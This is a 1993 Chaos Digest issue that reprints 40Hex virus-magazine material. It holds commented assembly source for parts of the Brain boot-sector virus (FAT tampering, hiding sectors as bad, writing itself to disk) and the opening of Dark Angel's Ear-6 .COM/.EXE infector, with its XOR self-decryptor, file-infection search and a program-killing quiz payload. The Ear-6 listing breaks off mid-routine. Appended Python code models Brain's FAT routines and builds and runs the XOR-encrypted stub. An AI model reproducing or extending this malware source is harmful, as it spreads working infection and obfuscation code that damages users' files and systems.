Chaos Digest              Saturday, 3 July 1993          Volume 1 : Number 70
                                                              ISSN 1244-4901

       Editor: Jean-Bernard Condat (jbcondat@attmail.com)
       Archivist: Yves-Marie Crabbe
       Co-editors: Arnaud Bigare, Stephane Briere

TABLE OF CONTENTS, #1.70 (3 July 1993)
File 1--40H VMag Number 8 Volume 2 Issue 4 #008(2)-009(1) (reprint)

Chaos Digest is a weekly electronic journal/newsletter. Subscriptions are
available at no cost by sending a message to:

        linux-activists-request@niksula.hut.fi

with a mail header or first line containing the following information:

        X-Mn-Admin: join CHAOS_DIGEST

The editors may be contacted by voice (+33 1 47874083), fax (+33 1 47877070)
or S-mail at: Jean-Bernard Condat, Chaos Computer Club France [CCCF],
B.P. 155, 93404 St-Ouen Cedex, France. He is a member of the EICAR and
EFF (#1299) groups.

Issues of ChaosD can also be found from the ComNet in Luxembourg BBS
(+352) 466893.

Back issues of ChaosD can be found on the Internet as part of the Computer
underground Digest archives. They're accessible using anonymous FTP:

  * kragar.eff.org [192.88.144.4] in /pub/cud/chaos
  * uglymouse.css.itd.umich.edu [141.211.182.53] in /pub/CuD/chaos
  * halcyon.com [192.135.191.2] in /pub/mirror/cud/chaos
  * ftp.cic.net [192.131.22.2] in /e-serials/alphabetic/c/chaos-digest
  * cs.ubc.ca [137.82.8.5] in /mirror3/EFF/cud/chaos
  * ftp.ee.mu.oz.au [128.250.77.2] in /pub/text/CuD/chaos
  * nic.funet.fi [128.214.6.100] in /pub/doc/cud/chaos
  * orchid.csv.warwick.ac.uk [137.205.192.5] in /pub/cud/chaos

CHAOS DIGEST is an open forum dedicated to sharing French information among
computerists and to the presentation and debate of diverse views. ChaosD
material may be reprinted for non-profit as long as the source is cited.
Some authors do copyright their material, and they should be contacted for
reprint permission. Readers are encouraged to submit reasoned articles in
French, English or German relating to computer culture and
telecommunications. Articles are preferred to short responses.
Please avoid quoting previous posts unless absolutely necessary.

DISCLAIMER: The views represented herein do not necessarily represent the
views of the moderators. Chaos Digest contributors assume all responsibility
for ensuring that articles submitted do not violate copyright protections.

----------------------------------------------------------------------

Date: Tue May 11 09:24:40 PDT 1993
From: 0005847161@mcimail.com (American_Eagle_Publication_Inc. )
Subject: File 1--40H VMag Number 8 Volume 2 Issue 4 #008(2)-009(1) (reprint)

FATManip:                               ;returns al as error code
        jmp     short delvedeeper
        nop
FATManipreadcounter dw 3
        db      ' (c) 1986 Brain & Amjads (pvt) Ltd'
delvedeeper:
        call    readFAT                 ;Get FAT ID byte
        mov     ax,word ptr ds:[offset readbuffer]
        cmp     ax,0FFFDh               ;is it 360K disk?
        je      is360Kdisk              ;continue if so
        mov     al,3                    ;al=3 == not good disk
        stc                             ;flag error
        retn                            ;and exit
is360Kdisk:
        mov     cx,37h
        mov     FATManipreadcounter,0   ;none found yet
checknextsector:
        call    FATentry12bit           ;get entry in FAT
        cmp     ax,0                    ;unused?
        jne     notunused
        inc     FATManipreadcounter     ;one more found unused
        cmp     FATManipreadcounter,3   ;If need more,
        jne     tryanother              ; go there
        jmp     short markembad         ;found 3 consecutive
        nop                             ;empty sectors
notunused:
        mov     FATManipreadcounter,0   ;must start over
tryanother:
        inc     cx                      ;try next sector
        cmp     cx,163h                 ;end of disk?
        jne     checknextsector         ;if not, continue
        mov     al,1                    ;al=1 == none empty
        stc                             ;Indicate error
        retn
markembad:
        mov     dl,3                    ;3 times
markanotherbad:
        call    markbad12bit
        dec     cx
        dec     dl
        jnz     markanotherbad
        inc     cx                      ;cx = first of the 3 clusters
        call    calc1sttrack
        call    writeFAT                ;update FAT
        mov     al,0                    ;al=0 == ok
        clc                             ;indicate success
        retn
markbad12bit:
        push    cx
        push    dx
        mov     si,offset readbuffer    ;si -> buffer
        mov     al,cl
        shr     al,1
        jc      low_12                  ;odd cluster: entry in high 12 bits
        call    clus2offset12bit
        mov     ax,[bx+si]              ;get FAT entry
        and     ax,0F000h               ;mark it bad
        or      ax,0FF7h
        jmp     short putitback         ;and put it back
        nop
low_12:
        call    clus2offset12bit
        mov     ax,[bx+si]              ;get FAT entry
        and     ax,0Fh                  ;mark it bad
        or      ax,0FF70h
putitback:
        mov     [bx+si],ax              ;replace FAT entry
        mov     word ptr ds:[400h][bx+si],ax ;in two places (2nd FAT copy)
        pop     dx
        pop     cx
        retn
FATentry12bit:
        push    cx
        mov     si,offset readbuffer    ;si->buffer
        mov     al,cl
        shr     al,1
;Part 3 of the virus starts here
        jc      want_high_12
        call    clus2offset12bit
        mov     ax,[bx+si]
        and     ax,0FFFh
        jmp     short exitFATentry12bit
        nop
want_high_12:
        call    clus2offset12bit        ;xxxxxxxxxxxx0000
        mov     ax,[bx+si]              ;^^^^^^^^^^^^wanted
        and     ax,0FFF0h               ;mask wanted bits
        mov     cl,4                    ;and move to correct
        shr     ax,cl                   ;position
exitFATentry12bit:
        pop     cx
        retn
clus2offset12bit:
        push    dx
        mov     ax,3
        mul     cx
        shr     ax,1                    ;ax = cx*1.5
        mov     bx,ax
        pop     dx
        retn
readFAT:
        mov     ah,2                    ;read
        call    FAT_IO
        retn
writeFAT:
        mov     ah,3                    ;write
        call    FAT_IO
        retn
FAT_IO:
        mov     cx,4                    ;try four times
FAT_IOLoop:
        push    cx
        push    ax
        mov     ah,0                    ;reset disk
        int     6Dh                     ;int 13h
        pop     ax
        jc      tryFAT_IOagain
        mov     bx,offset readbuffer
        mov     al,4                    ;4 sectors
        mov     dh,0                    ;head 0
        mov     dl,curdrive
        mov     cx,2                    ;sector 2
        push    ax                      ;(FAT)
        int     6Dh                     ;int 13h
        pop     ax
        jnc     exitFAT_IO
tryFAT_IOagain:
        pop     cx
        loop    FAT_IOLoop
        pop     ax                      ;four failures: discard the return
        pop     ax                      ;addresses into readFAT/writeFAT and
        mov     al,2                    ;FATManip, so retn lands in the
        stc                             ;caller of FATManip with CF set
        retn
exitFAT_IO:
        pop     cx
        retn
calc1sttrack:
        push    cx
        sub     cx,2
        shl     cx,1                    ;2 sectors/cluster
        add     cx,0Ch                  ;start of data area
        mov     ax,cx                   ;ax = sector
        mov     cl,12h                  ;18 sectors per cylinder (9 x 2 heads)
        div     cl                      ;ax/18 = al (cylinder) rem ah
        mov     byte ptr firstsector+1,al
        mov     firsthead,0
        inc     ah
        cmp     ah,9                    ;past track 9?
        jbe     notpasttrack9           ;nope, we are ok
        sub     ah,9                    ;otherwise, adjust
        mov     firsthead,1
notpasttrack9:
        mov     byte ptr firstsector,ah
        pop     cx
        retn
        db      0, 0, 0, 0, 0, 0
r_or_w_root db 3
entrycount  dw 35h
tempsave1   dw 303h
tempsave2   dw 0EBEh
tempsave3   dw 1
tempsave4   dw 100h
        db      0E0h,0D8h, 9Dh,0D7h,0E0h, 9Fh
        db      8Dh, 98h, 9Fh, 8Eh,0E0h
        db      ' (c) ashar $'
changeroot:
        call    readroot                ;read in root directory
        jc      donotchangeroot
        push    di
        call    changevolume            ;change volume label
        pop     di
        jc      donotchangeroot
        call    writeroot               ;write back new root dir
donotchangeroot:
        retn
;The following is just garbage bytes
        db      0BBh, 9Bh, 04h,0B9h, 0Bh
        db      0,8Ah,7,0F6h,0D8h,88h,4,46h,43h
        db      0E2h,0F6h,0B0h,8,88h,4,0F8h,0C3h
        db      0C6h, 06h
changevolume:
        mov     entrycount,6Ch
        mov     si,offset readbuffer+40h ;3rd dir entry
        mov     tempsave1,dx
        mov     ax,entrycount           ;6Ch
        shr     ax,1
        mov     tempsave3,ax            ;36h
        shr     ax,1
        mov     tempsave2,ax            ;1Bh
        xchg    ax,cx
        and     cl,43h                  ;cx = 3
        mov     di,tempsave2
        add     di,1E3h                 ;di = 01FE
findlabel:
        mov     al,[si]
        cmp     al,0
        je      dolabel                 ;no more entries
        mov     al,[si+0Bh]             ;attribute byte
        and     al,8                    ;volume label?
        cmp     al,8                    ;yes?
        je      dolabel                 ;then change it!
        add     si,20h                  ;go to next directory entry
        dec     entrycount
        jnz     findlabel               ;loop back
        stc                             ;Error!
        retn
        db      8Bh
dolabel:
        mov     bx,[di]                 ;offset a_data
        xor     bx,tempsave3            ;bx = 53Ah
        mov     tempsave3,si            ;si->direntry
        cli
        mov     ax,ss
        mov     tempsave1,ax
        mov     tempsave2,sp
        mov     ax,cs
        mov     ss,ax
        mov     sp,tempsave3
        add     sp,0Ch                  ;->reserved area
        mov     cl,51h
        add     dx,444Ch
        mov     di,2555h
        mov     cx,0C03h
        repe    cmpsw
        mov     ax,0B46h
        mov     cx,3
        rol     ax,cl                   ;ax = 5A30h
        mov     tempsave3,ax
        mov     cx,5
        mov     dx,8
        sub     tempsave3,5210h         ;820h
        push    tempsave3               ;store attributes/reserved
;I haven't commented the remainder of this procedure.
;It basically changes the volume label to read "(c) Brain"
;Comment mode OFF
dowhatever:
        mov     ah,[bx]                 ;5a3h
        inc     bx
        mov     dl,ah
        shl     dl,1
        jc      dowhatever
searchstuff:
        mov     dl,[bx]                 ;dl=C2h
        inc     bx                      ;bx=53Eh
        mov     al,dl
        shl     dl,1
        jc      searchstuff
        add     ax,1D1Dh
        push    ax
        inc     tempsave3
        db      73h, 01h                ;jnc $+3
        db      0EAh,0E2h,0E1h, 8Bh, 26h ;jmp 268B:E1E2
        xchg    bp,ax
        add     al,0A1h
        xchg    bx,ax
        add     al,8Eh
        sar     bl,1
        add     dh,[bp+si]
        clc
        ret
;db 95h, 04h,0A1h, 93h, 04h, 8Eh
;db 0D0h,0FBh, 02h, 32h,0F8h,0C3h
;Comment mode ON
readroot:
        mov     r_or_w_root,2           ;set action code
        jmp     short do_rw_root        ;easier to do w/
        nop                             ;mov ah, 2
writeroot:
        mov     r_or_w_root,3
        jmp     short do_rw_root        ;this is somewhat useless
        nop
do_rw_root:
        mov     dh,0                    ;head 0
        mov     dl,curdrive
        mov     cx,6                    ;sector 6
        mov     ah,r_or_w_root
        mov     al,4                    ;4 sectors
        mov     bx,offset readbuffer
        call    doint13h
        jc      exit_rw_root            ;quit on error
        mov     cx,1
        mov     dh,1                    ;head 1
        mov     ah,r_or_w_root
        mov     al,3
        add     bx,800h
        call    doint13h
exit_rw_root:
        retn
doint13h:
        mov     tempsave1,ax
        mov     tempsave2,bx
        mov     tempsave3,cx
        mov     tempsave4,dx
        mov     cx,4
doint13hloop:
        push    cx
        mov     ah,0                    ;Reset disk
        int     6Dh
        jc      errordoingint13h
        mov     ax,tempsave1
        mov     bx,tempsave2
        mov     cx,tempsave3
        mov     dx,tempsave4
        int     6Dh                     ;int 13h
        jnc     int13hsuccess
errordoingint13h:
        pop     cx
        loop    doint13hloop
        stc                             ;indicate error
        retn
int13hsuccess:
        pop     cx
        retn
        db      0, 0, 0
;Part 4 of the virus starts here
tempstorecx dw 3
readwritecurrentdata dw 301h
writevirus:
        call    FATManip
        jc      exitwritevirus
        mov     cursector,1
        mov     curhead,0
        mov     bx,offset readbuffer
        call    readcurrent
        mov     bx,offset readbuffer
        mov     ax,firstsector
        mov     cursector,ax
        mov     ah,firsthead
        mov     curhead,ah
        call    writecurrent
        call    calcnextsector
        mov     cx,5
        mov     bx,200h
writeanothersector:
        mov     tempstorecx,cx
        call    writecurrent
        call    calcnextsector
        add     bx,200h
        mov     cx,tempstorecx
        loop    writeanothersector
        mov     curhead,0
        mov     cursector,1
        mov     bx,0
        call    writecurrent
        clc                             ;indicate success
exitwritevirus:
        retn
readcurrent:
        mov     readwritecurrentdata,201h
        jmp     short doreadwrite
        nop
writecurrent:
        mov     readwritecurrentdata,301h
        jmp     short doreadwrite       ;This is pointless.
        nop
doreadwrite:
        push    bx
        mov     cx,4
tryreadwriteagain:
        push    cx
        mov     dh,curhead
        mov     dl,curdrive
        mov     cx,cursector
        mov     ax,readwritecurrentdata ;read or write?
        int     6Dh                     ;int 13h
        jnc     readwritesuccessful
        mov     ah,0                    ;reset disk
        int     6Dh                     ;int 13h
        pop     cx
        loop    tryreadwriteagain
        pop     bx                      ;saved bx
        pop     bx                      ;return address into writevirus:
        stc                             ;retn now returns from writevirus
        retn                            ;itself, with CF set
readwritesuccessful:
        pop     cx
        pop     bx
        retn
calcnextsector:
        inc     byte ptr cursector      ;next sector
        cmp     byte ptr cursector,0Ah
        jne     donecalculate           ;finished calculations
        mov     byte ptr cursector,1    ;clear sector #
        inc     curhead                 ;and go to next head
        cmp     curhead,2               ;if not too large,
        jne     donecalculate           ;we are done
        mov     curhead,0               ;otherwise clear head #
        inc     byte ptr cursector+1    ;and advance cylinder
donecalculate:
        retn
        db      64h, 74h, 61h
;read buffer starts here
;insert your favorite boot block below...
readbuffer:
brain   ends
        end

+++++

40Hex Number 8 Volume 2 Issue 4                                     File 009

                             -=PHALCON/SKISM=-
                                Ear-6 Virus

The Ear-6 is a parasitic, non-resident, .COM & .EXE infector. It infects 5
files every time it is run. It will traverse towards the root directory if
fewer than 5 files are found. We have no clue as to what the 'AUX error'
that Patti talks about is. But then again, Patti isn't sure as to who she
is, let alone an accurate description of one of our virii. On activation
(1st of any month), it plays an ear quiz with the victim. Failure to answer
the question will result in program termination.

 -) Gheap
---------------------------------------------------------------------------
;[Ear-6]
;The ear and hearing virus six
;Written by Dark Angel of PHALCON/SKISM
;I (the dark angel) wrote this program many weeks ago.
;Do not modify this program and give it to other people AS IF
;it were your own.
;Where is my llama, mom?
; little dictionary
;Spanish         English                 Spanish         English
;abre            open                    mango           handle
;aprueba         pass (a test)           mascara         mask
;atras           back                    mensaje         message
;azado           random                  mes             month
;busca           find                    monton          heap
;cierra          close                   oreja, oido     ear
;cifra           code, encrypt, decrypt  pila            stack
;codo            pointer                 pregunta        question
;corto           terse, short            primer          first
;empieza         begin                   remendar        patch
;escriba         write                   renuncia        reject
;fecha           date                    respuesta       answer
;ficha           file                    salta           exit
;indice          table                   siguiente       following, next
;?le gusta?      do you like?            suspende        fail (a test)
;longitud        length                  termina         end
;magnitud        size                    virus           virus (!)

.model tiny
.code
org 100h
longitud_del_virus = TerminaVir - EmpezarVir
longitud_del_escribir = offset termina_escribir - offset escribir
id = 'GH'                               ;Stands for the leader of
                                        ;PHALCON/SKISM, Garbageheap
Empezar:
        db      0e9h, 0, 0              ;jmp EmpezarVir
EmpezarVir:
shwing:
remendar1:
        mov     bx, offset EmpezarCifra
remendar2:
        mov     cx, ((longitud_del_virus + 1) / 2)
hacia_atras:                            ;back
        db      2eh
remendar3:
        db      81h, 37h, 0, 0          ;xor word ptr cs:[bx], 0
        add     bx, 2
        loop    hacia_atras
EmpezarCifra:
        call    siguiente               ;It's stupid, but it's short
siguiente:
        pop     bp
        sub     bp, offset siguiente
        mov     byte ptr [bp+numinf], 0
        cld                             ;Not necessary, but why not?
        cmp     sp, id
        jz      SoyEXE
SoyCOM:
        mov     di, 100h
        push    di
        lea     si, [bp+Primer3]
        movsb
        jmp     short SoyNada
SoyEXE:
        push    ds
        push    es
        push    cs
        push    cs
        pop     ds
        pop     es
        lea     di, [bp+EXE_Donde_JMP]  ;the original CS:IP of the
        lea     si, [bp+EXE_Donde_JMP2] ;infected file
        movsw
        movsw
        movsw
        jmp     short SoyNada
NombreDelVirus  db 0,'[Ear-6]',0        ;In English, of course!
NombreDelAutor  db 'Dark Angel',0
SoyNada:
        movsw
        mov     ah, 1ah                 ;Set a new DTA, because we
        lea     dx, [bp+offset nuevoDTA] ;don't want to destroy the
        int     21h                     ;original DTA
        mov     ax, word ptr [bp+remendar1+1]
        mov     word ptr [bp+tempo], ax
        mov     ah, 47h                 ;Get the current
        xor     dl, dl                  ;directory
        lea     si, [bp+diroriginal]
        int     21h
looper:
        lea     dx, [bp+offset mascara1] ;"máscara", not "mascara",
        call    infectar_mascara        ;but accents can't be used
                                        ;in MASM/TASM.
                                        ;What a pity!
                                        ;mascara1 is '*.EXE',0
        lea     dx, [bp+offset mascara2] ;mascara2 is '*.COM',0
        call    infectar_mascara        ;infect the COM files
        cmp     byte ptr [bp+numinf], 5 ;Has it infected five files?
        jg      saltar                  ;If so, no need to look for
                                        ;more files.
        mov     ah, 3bh                 ;Change directory to the
        lea     dx, [bp+puntos]         ;parent directory
        int     21h                     ;('..', 'dot dot')
        jnc     looper
saltar:
        lea     dx, [bp+backslash]      ;Change directory to the
        mov     ah, 3bh                 ;directory we finished in.
        int     21h
        mov     ah, 2ah                 ;Activates on the first of
        int     21h                     ;every month
        cmp     dl, 1                   ;If it isn't the first,
        jnz     saltarahora             ;exit now! (duh-o)
        mov     ah, 2ch                 ;What time is it?
        int     21h
        cmp     dl, 85                  ;85% probability of
        jg      saltarahora             ;activation
        and     dx, 7                   ;A quasi-random number;
        shl     dl, 1                   ;use it to determine
        mov     bx, bp                  ;which question the virus
        add     bx, dx                  ;will ask
        mov     dx, word ptr [bx+indice] ;table for the little quiz
        add     dx, bp
        inc     dx
        push    dx                      ;Save the pointer to the question
        mov     ah, 9                   ;Print the first part of
        lea     dx, [bp+mensaje]        ;the question
        int     21h
        pop     dx                      ;Print the ear or hearing
        int     21h                     ;part
        dec     dx
        push    dx                      ;Save the correct answer
        lea     dx, [bp+secciones]      ;Print the sections of the
        int     21h                     ;ear and hearing
trataotrarespuesta:
        mov     ah, 7                   ;Get the answer from the
        int     21h                     ;"victim"
        cmp     al, '1'                 ;Needs an answer from
        jl      trataotrarespuesta      ;one to three
        cmp     al, '3'                 ;Reject other answers
        jg      trataotrarespuesta
        int     29h                     ;Print the answer
        pop     bx                      ;The pointer to the correct
                                        ;answer
        mov     ah, 9                   ;Prepare to print a
                                        ;message
        cmp     al, byte ptr [bx]       ;Is it correct?
        jz      saltarapidamente        ;Passed the little quiz.
                                        ;So, exit quickly.
        lea     dx, [bp+suspendido]     ;Sorry, but you did not pass
        int     21h                     ;the easy little quiz!
        mov     ah, 4ch                 ;Study more and the program
        jmp     quite                   ;will let you continue.
saltarapidamente:
        lea     dx, [bp+aprueba]
        int     21h
saltarahora:
        mov     ah, 1ah                 ;Restore the original DTA
        mov     dx, 80h
quite:
        cmp     sp, id - 4              ;Is it EXE or COM?
        jz      vuelvaEXE
vuelvaCOM:
        int     21h                     ;Restore the DTA and return
        retn                            ;to the original COM file
vuelvaEXE:
        pop     es
        pop     ds                      ;ds -> PSP
        int     21h
        mov     ax, es
        add     ax, 10h                 ;Adjust for the PSP
        add     word ptr cs:[bp+EXE_Donde_JMP+2], ax
        cli
        add     ax, word ptr cs:[bp+PilaOriginal+2]
        mov     ss, ax
        mov     sp, word ptr cs:[bp+PilaOriginal]
        sti
        db      0eah                    ;JMP FAR PTR SEG:OFF
EXE_Donde_JMP   dd 0
PilaOriginal    dd 0
EXE_Donde_JMP2  dd 0
PilaOriginal2   dd 0
infectar_mascara:
        mov     ah, 4eh                 ;Find the first file
        mov     cx, 7                   ;Any attribute
brb_brb:
        int     21h
        jc      hasta_la_vista_bebe     ;Didn't find one
        xor     al, al
        call    abrir                   ;Open the file
        mov     ah, 3fh
        mov     cx, 1ah
        lea     dx, [bp+buffer]
        int     21h
        mov     ah, 3eh                 ;Close the file
        int     21h
        lea     si,[bp+nuevoDTA+15h]    ;Save things about the file,
        lea     di,[bp+f_atrib]         ;for example the creation
        mov     cx, 9                   ;date
        rep     movsb

------------------------------

End of Chaos Digest #1.70
************************************
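The FAT12 bookkeeping in FATManip, FATentry12bit, markbad12bit and calc1sttrack of the Brain listing in File 1 above, modelled in Python as an added example. This is not code from 40Hex or from the virus. It assumes the 360K layout the listing hard-codes (data area at sector 0Ch, 2 sectors per cluster, 9 sectors per track, 2 heads, second FAT copy 400h bytes into the 4-sector read buffer); the FAT image is constructed here, and bad_clusters is a forensic helper the listing does not have.

```python
"""Added example (not from the 40Hex listing): Python model of the Brain
routines FATentry12bit / markbad12bit / FATManip / calc1sttrack.
The FAT image below is constructed for the demo, not read from a disk."""
import struct

BAD12 = 0xFF7             # FAT12 "bad cluster" marker written by markbad12bit
FREE12 = 0x000            # unused cluster
FAT_COPY = 0x400          # 2nd FAT copy: 2 sectors * 512 bytes into the 4-sector read
DATA_START_LBA = 0x0C     # 360K: boot + 2 FATs (2 sectors each) + 7-sector root dir
SECTORS_PER_CLUSTER = 2
SECTORS_PER_TRACK = 9     # per head; 12h = 18 per cylinder, as in calc1sttrack


def fat12_get(fat, n):
    """FATentry12bit: entry n sits at byte offset n*1.5 (clus2offset12bit).
    Even n -> low 12 bits of the word there, odd n -> high 12 bits."""
    off = (n * 3) >> 1
    w = struct.unpack_from("<H", fat, off)[0]
    return (w >> 4) if n & 1 else (w & 0x0FFF)


def fat12_set(fat, n, value):
    """Inverse of fat12_get; keeps the neighbouring nibble intact, the way
    markbad12bit does with its and/or masks."""
    off = (n * 3) >> 1
    w = struct.unpack_from("<H", fat, off)[0]
    if n & 1:
        w = (w & 0x000F) | ((value & 0x0FFF) << 4)   # 'low_12' path: or ax,0FF70h
    else:
        w = (w & 0xF000) | (value & 0x0FFF)          # or ax,0FF7h
    struct.pack_into("<H", fat, off, w)


def brain_mark_three(buf, first=0x37, limit=0x163):
    """FATManip: walk clusters first..limit-1 for three consecutive free
    entries; mark them 0xFF7 in both FAT copies and return the first cluster
    of the run, or None (the listing's 'al=1 == none empty' error)."""
    run = 0
    for n in range(first, limit):
        if fat12_get(buf, n) != FREE12:
            run = 0
            continue
        run += 1
        if run == 3:
            for c in (n, n - 1, n - 2):                  # markanotherbad loop
                fat12_set(buf, c, BAD12)
                fat12_set(memoryview(buf)[FAT_COPY:], c, BAD12)
            return n - 2
    return None


def cluster_to_chs(cluster):
    """calc1sttrack: cluster -> (cylinder, head, 1-based sector) on 360K."""
    lba = (cluster - 2) * SECTORS_PER_CLUSTER + DATA_START_LBA
    cylinder, rem = divmod(lba, 2 * SECTORS_PER_TRACK)
    sector, head = rem + 1, 0
    if sector > SECTORS_PER_TRACK:      # 'past track 9?' -> same cylinder, head 1
        sector -= SECTORS_PER_TRACK
        head = 1
    return cylinder, head, sector


def bad_clusters(fat, nclusters=354):
    """Forensic check: data clusters carrying the bad marker. A run of exactly
    three at cluster >= 0x37 on a 360K floppy is the footprint this code leaves."""
    return [n for n in range(2, 2 + nclusters) if fat12_get(fat, n) == BAD12]


def make_sample_fat():
    """Constructed 4-sector buffer: FAT copy 1 followed by copy 2."""
    fat = bytearray(FAT_COPY)
    fat[0:3] = b"\xFD\xFF\xFF"          # media byte FD -> first word 0FFFDh
    for n in range(2, 0x38):            # clusters 2..0x37 in use
        fat12_set(fat, n, 0xFFF)
    fat12_set(fat, 0x39, 0xFFF)         # a lone used cluster breaks a run
    return fat + fat


if __name__ == "__main__":
    buf = make_sample_fat()
    first = brain_mark_three(buf)
    print(hex(first), bad_clusters(buf), cluster_to_chs(first))
```

On the sample FAT the scan skips cluster 38h (only one free before the used 39h) and settles on 3Ah..3Ch; calc1sttrack then places cluster 3Ah at cylinder 6, head 1, sector 8, which is where writevirus starts writing the boot sector copy.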
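The self-decrypting loop at remendar1/remendar2/remendar3 in the Ear-6 listing above, modelled in Python as an added example; this is not Dark Angel's code. The byte encoding of the stub, the fixed org 100h load offset and the names build_stub, build_image and run_stub are assumptions of this model, and the infection-time patching of the three immediates, which the page does not show, is replaced by build_image. One detail the model makes visible: the listing takes its word count from longitud_del_virus (measured from EmpezarVir) but starts the loop at EmpezarCifra, so the real loop also runs over bytes past TerminaVir; here the count is derived from the body and only the (len+1)/2 rounding is kept.

```python
"""Added example (not Dark Angel's code): the Ear-6 word-XOR decryptor as
data. Stub encoding and the fixed ORG are assumptions of this model."""
import struct

ORG = 0x100          # org 100h: first byte of a .COM image is at offset 100h
STUB_LEN = 16
OFF_START = 1        # remendar1: mov bx, <offset of first encrypted byte>
OFF_COUNT = 4        # remendar2: mov cx, <number of words>
OFF_KEY = 9          # remendar3: xor word ptr cs:[bx], <key>


def build_stub(start, nwords, key):
    """Assumed encoding of the loop in the listing:
    mov bx,imm16 / mov cx,imm16 / xor word ptr cs:[bx],imm16 / add bx,2 /
    loop hacia_atras.  E2 F6 jumps 10 bytes back to the 2E prefix."""
    return (b"\xBB" + struct.pack("<H", start)
            + b"\xB9" + struct.pack("<H", nwords)
            + b"\x2E\x81\x37" + struct.pack("<H", key)
            + b"\x83\xC3\x02"
            + b"\xE2\xF6")


def xor_words(data, start, nwords, key):
    """The loop body, in place: nwords little-endian words from `start`."""
    for off in range(start, start + 2 * nwords, 2):
        w = struct.unpack_from("<H", data, off)[0] ^ key
        struct.pack_into("<H", data, off, w)


def build_image(body, key):
    """Stub + body, with the body stored XORed so running the stub restores
    it.  The count is (len+1)//2 as in the listing, so an odd-length body
    drags one pad byte into the loop."""
    padded = bytearray(body) + (b"\0" if len(body) & 1 else b"")
    nwords = (len(body) + 1) // 2
    xor_words(padded, 0, nwords, key)
    return build_stub(ORG + STUB_LEN, nwords, key) + bytes(padded)


def run_stub(image):
    """Emulate the stub on its own image: read the bx/cx/key immediates,
    apply the loop with bx taken relative to ORG, return what follows."""
    start = struct.unpack_from("<H", image, OFF_START)[0]
    nwords = struct.unpack_from("<H", image, OFF_COUNT)[0]
    key = struct.unpack_from("<H", image, OFF_KEY)[0]
    data = bytearray(image)
    xor_words(data, start - ORG, nwords, key)
    return bytes(data[STUB_LEN:])


if __name__ == "__main__":
    sample = b"\xB4\x4C\xCD\x21" + b"hello"      # constructed 9-byte body
    img = build_image(sample, 0x5A30)
    print(img[STUB_LEN:].hex(), run_stub(img)[:len(sample)] == sample)
```

With key 0, the value the listing assembles into remendar3, the loop is the identity and the body is stored in clear; every other key changes every byte of the stored body while the 16-byte stub itself stays constant apart from the three immediates, which is why scanners keyed on such stubs look at the opcode skeleton rather than at the body.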